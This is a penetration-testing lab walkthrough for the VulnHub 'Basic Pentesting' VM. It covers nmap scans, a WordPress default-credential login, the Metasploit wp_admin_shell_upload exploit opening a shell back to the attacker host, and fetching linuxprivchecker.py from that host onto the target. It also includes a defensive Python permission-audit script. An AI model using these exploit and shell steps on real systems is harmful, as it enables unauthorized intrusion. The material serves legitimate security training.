Privilege Escalation
Download the Basic Pentesting virtual machine from the following website:
https://www.vulnhub.com/entry/basic-pentesting-1,216/
1. Scan the target server using nmap.
nmap -Pn -sS --stats-every 3m --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN /root/privesc/tcp.txt.txt 10.0.0.24
nmap -nvv -Pn -sSV -p 21,22,80 --version-intensity 9 -A -oN /root/privesc/tcp1.txt.txt 192.168.134.147
nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN /root/privesc/udp.txt.txt 10.0.0.24
2. Browse the target server in Firefox.
3. Run a vulnerability scan using nikto or dirbuster.
4. Add the following entry to /etc/hosts with echo, then browse to "http://10.0.0.24/secret" again.
echo "10.0.0.24 vtcsec" >> /etc/hosts
5. Try to log in to WordPress (use the default username and password: admin/admin).
6. Exploit the target server using Metasploit.
First, start Metasploit.
msfconsole
Choose the proper module and set the options.
use exploit/unix/webapp/wp_admin_shell_upload
set username admin
set password admin
set targeturi /secret/
set lhost 10.0.0.109
set rhost 10.0.0.24
exploit
getuid
shell
7. Download linuxprivchecker.py from the following website and copy it to the folder /var/www/html on Kali Linux.
https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
Download linuxprivchecker.py to the target server and grant it full permissions.
wget 10.0.0.109/linuxprivchecker.py
chmod 777 linuxprivchecker.py
ls -la
Check the target Linux server's privileges by running the following command.
python linuxprivchecker.py
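Among other things, the checker lists world-writable files. The same check from the defender's side, as an added example (not part of linuxprivchecker or of the original walkthrough): it walks a filesystem tree and flags account files whose mode exceeds a baseline, plus any other world-writable regular file. The BASELINE table (typical Debian/Ubuntu defaults), the function names and the sample tree are assumptions constructed for the illustration.

```python
#!/usr/bin/env python3
"""Audit a filesystem tree for over-permissive account files and other
world-writable regular files. Added example, not part of linuxprivchecker."""
import os
import stat
import tempfile

# Assumption: maximum mode expected on account/auth files (typical
# Debian/Ubuntu defaults). Adjust to the local hardening baseline.
BASELINE = {
    "/etc/passwd": 0o644,
    "/etc/group": 0o644,
    "/etc/shadow": 0o640,
    "/etc/sudoers": 0o440,
    "/etc/crontab": 0o644,
}

# Kernel pseudo-filesystems: their entries are kernel interfaces, so they
# are skipped here to keep the report readable.
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")


def _logical(path, root):
    """Return the path as seen on the audited system (root may be a mounted image)."""
    return "/" + os.path.relpath(path, root).replace(os.sep, "/")


def _in_pseudo_fs(logical):
    return any(logical == p or logical.startswith(p + "/") for p in PSEUDO_FS)


def audit(root="/"):
    """Return sorted (severity, path, mode) findings for the tree under root."""
    root = os.path.abspath(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place so os.walk never descends into pseudo-filesystems.
        dirnames[:] = [d for d in dirnames
                       if not _in_pseudo_fs(_logical(os.path.join(dirpath, d), root))]
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: never follow symlinks
            except OSError:
                continue  # file vanished or is unreadable
            if not stat.S_ISREG(st.st_mode):
                continue  # symlink modes are meaningless; devices/sockets out of scope
            mode = stat.S_IMODE(st.st_mode)
            logical = _logical(full, root)
            allowed = BASELINE.get(logical)
            if allowed is not None and mode & ~allowed:
                findings.append(("CRITICAL", logical, mode))
            elif mode & stat.S_IWOTH:
                findings.append(("WARN", logical, mode))
    return sorted(findings)


def remediation(findings):
    """Turn findings into the chmod commands an administrator would review."""
    cmds = []
    for severity, path, _mode in findings:
        if severity == "CRITICAL":
            cmds.append("chmod %o %s" % (BASELINE[path], path))
        else:
            cmds.append("chmod o-w %s" % path)
    return cmds


def build_sample_tree():
    """Create a constructed sample tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="audit-sample-")
    sample = {  # constructed modes, chosen to exercise each branch
        "etc/passwd": 0o666,       # writable by everyone: exceeds baseline
        "etc/shadow": 0o640,       # matches baseline
        "etc/hosts": 0o644,        # not in baseline, not world-writable
        "tmp/tool.py": 0o777,      # world-writable file outside the baseline
        "sys/kernel/knob": 0o666,  # under a pseudo-filesystem prefix: skipped
    }
    for rel, mode in sample.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w"):
            pass
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    results = audit(build_sample_tree())
    for severity, path, mode in results:
        print("%-8s %04o %s" % (severity, mode, path))
    for cmd in remediation(results):
        print("fix:", cmd)
```

Run against a real host with audit("/") as root so unreadable directories are not silently skipped.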
The check result: